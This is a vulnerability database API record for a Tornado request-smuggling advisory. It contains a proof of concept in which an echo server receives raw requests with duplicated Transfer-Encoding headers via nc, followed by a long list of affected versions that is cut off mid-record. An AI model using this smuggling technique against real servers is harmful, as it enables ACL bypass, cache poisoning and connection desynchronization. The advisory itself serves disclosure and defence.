Vulnerability Instance
Lookup for vulnerabilities affecting packages.
GET /api/vulnerabilities/18609?format=api
{ "url": "http://public2.vulnerablecode.io/api/vulnerabilities/18609?format=api", "vulnerability_id": "VCID-e25f-6gkj-vfgw", "summary": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in tornado\n### Summary\nWhen Tornado receives a request with two `Transfer-Encoding: chunked` headers, it ignores them both. This enables request smuggling when Tornado is deployed behind a proxy server that emits such requests. [Pound](https://en.wikipedia.org/wiki/Pound_(networking)) does this.\n\n### PoC\n0. Install Tornado.\n1. Start a simple Tornado server that echoes each received request's body:\n```bash\ncat << EOF > server.py\nimport asyncio\nimport tornado\n\nclass MainHandler(tornado.web.RequestHandler):\n def post(self):\n self.write(self.request.body)\n\nasync def main():\n tornado.web.Application([(r\"/\", MainHandler)]).listen(8000)\n await asyncio.Event().wait()\n\nasyncio.run(main())\nEOF\npython3 server.py &\n```\n2. Send a valid chunked request:\n```bash\nprintf 'POST / HTTP/1.1\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n1\\r\\nZ\\r\\n0\\r\\n\\r\\n' | nc localhost 8000\n```\n3. Observe that the response is as expected:\n```\nHTTP/1.1 200 OK\nServer: TornadoServer/6.3.3\nContent-Type: text/html; charset=UTF-8\nDate: Sat, 07 Oct 2023 17:32:05 GMT\nContent-Length: 1\n\nZ\n```\n4. Send a request with two `Transfer-Encoding: chunked` headers:\n```\nprintf 'POST / HTTP/1.1\\r\\nTransfer-Encoding: chunked\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n1\\r\\nZ\\r\\n0\\r\\n\\r\\n' | nc localhost 8000\n```\n5. Observe the strange response:\n```\nHTTP/1.1 200 OK\nServer: TornadoServer/6.3.3\nContent-Type: text/html; charset=UTF-8\nDate: Sat, 07 Oct 2023 17:35:40 GMT\nContent-Length: 0\n\nHTTP/1.1 400 Bad Request\n\n```\nThis is because Tornado believes that the request has no message body, so it tries to interpret `1\\r\\nZ\\r\\n0\\r\\n\\r\\n` as its own request, which causes a 400 response. With a little cleverness involving `chunk-ext`s, you can get Tornado to instead respond 405, which has the potential to desynchronize the connection, as opposed to 400 which should always result in a connection closure.\n\n### Impact\nAnyone using Tornado behind a proxy that forwards requests containing multiple `Transfer-Encoding: chunked` headers is vulnerable to request smuggling, which may entail ACL bypass, cache poisoning, or connection desynchronization.", "aliases": [ { "alias": "GHSA-753j-mpmx-qq6g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/58666?format=api", "purl": "pkg:pypi/tornado@6.4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.4.1" } ], "affected_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/2261?format=api", "purl": "pkg:pypi/tornado@0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/2262?format=api", "purl": "pkg:pypi/tornado@1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/2263?format=api", "purl": "pkg:pypi/tornado@1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/2264?format=api", "purl": "pkg:pypi/tornado@1.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@1.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/2265?format=api", "purl": "pkg:pypi/tornado@1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/2266?format=api", "purl": "pkg:pypi/tornado@1.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@1.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/2267?format=api", "purl": "pkg:pypi/tornado@2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/2268?format=api", "purl": "pkg:pypi/tornado@2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/2269?format=api", "purl": "pkg:pypi/tornado@2.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/2270?format=api", "purl": "pkg:pypi/tornado@2.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/2271?format=api", "purl": "pkg:pypi/tornado@2.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/9944?format=api", "purl": "pkg:pypi/tornado@2.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/9945?format=api", "purl": "pkg:pypi/tornado@2.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/9946?format=api", "purl": "pkg:pypi/tornado@2.4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.4.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/9947?format=api", "purl": "pkg:pypi/tornado@3.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/9948?format=api", "purl": "pkg:pypi/tornado@3.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/9949?format=api", "purl": "pkg:pypi/tornado@3.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/9950?format=api", "purl": "pkg:pypi/tornado@3.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/9951?format=api", "purl": "pkg:pypi/tornado@3.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/9952?format=api", "purl": "pkg:pypi/tornado@3.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/9953?format=api", "purl": "pkg:pypi/tornado@3.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/9954?format=api", "purl": "pkg:pypi/tornado@3.2.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.2.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35053?format=api", "purl": "pkg:pypi/tornado@4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/35054?format=api", "purl": "pkg:pypi/tornado@4.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35055?format=api", "purl": "pkg:pypi/tornado@4.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35056?format=api", "purl": "pkg:pypi/tornado@4.1b2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.1b2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35057?format=api", "purl": "pkg:pypi/tornado@4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35058?format=api", "purl": "pkg:pypi/tornado@4.2b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.2b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35059?format=api", "purl": "pkg:pypi/tornado@4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35060?format=api", "purl": "pkg:pypi/tornado@4.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35061?format=api", "purl": "pkg:pypi/tornado@4.3b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.3b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35062?format=api", "purl": "pkg:pypi/tornado@4.3b2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.3b2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35063?format=api", "purl": "pkg:pypi/tornado@4.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/35065?format=api", "purl": "pkg:pypi/tornado@4.4b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.4b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35066?format=api", "purl": "pkg:pypi/tornado@4.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/35067?format=api", "purl": "pkg:pypi/tornado@4.4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { 